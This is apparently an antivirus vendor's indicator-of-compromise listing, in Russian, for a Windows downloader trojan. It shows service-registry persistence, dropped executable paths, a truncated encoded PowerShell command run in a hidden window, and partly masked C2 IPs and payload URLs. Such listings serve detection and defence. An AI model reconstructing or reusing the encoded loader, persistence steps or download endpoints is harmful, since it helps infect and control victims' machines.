Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\pautoenr] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\pautoenr] 'ImagePath' = '"%WINDIR%\SysWOW64\vccorlib110\pautoenr.exe"'
- 'pautoenr' "%WINDIR%\SysWOW64\vccorlib110\pautoenr.exe"
- 'pautoenr' %WINDIR%\SysWOW64\vccorlib110\pautoenr.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA...
- %HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe
- %WINDIR%\syswow64\vccorlib110\pautoenr.exe
- %HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe в %WINDIR%\syswow64\vccorlib110\pautoenr.exe
- '12.##3.208.58':80
- '45.#3.35.74':8080
- '87.##6.253.248':8080
- http://ac#####sinstitute.com/wp-includes/iLIsBcutT/
- http://12.##3.208.58/wHyQ7tbJL2iezHJwY/kW7OTe/
- http://87.###.253.248:8080/4BNv8p/X4fGC/WcxAw0G08Jwz/ via 87.##6.253.248
- DNS ASK ac#####sinstitute.com
- '%HOMEPATH%\twxu72r\gk_5vog\vilai72b.exe'
- '%WINDIR%\syswow64\vccorlib110\pautoenr.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABQAHQAMAA4AF8ANABlAD0AKAAnAEMAJwArACgAJwB1AGMAJwArACcAdwAnACkAKwAoACcAaABsACcAKwAnAGUAJwApACkAOwAuACgAJwBuAGUAdwAtAGkAJwArACcAdABlAG0AJwApACAAJABFAG4AVgA6AHUAUwBFAFIAcA...' (со скрытым окном)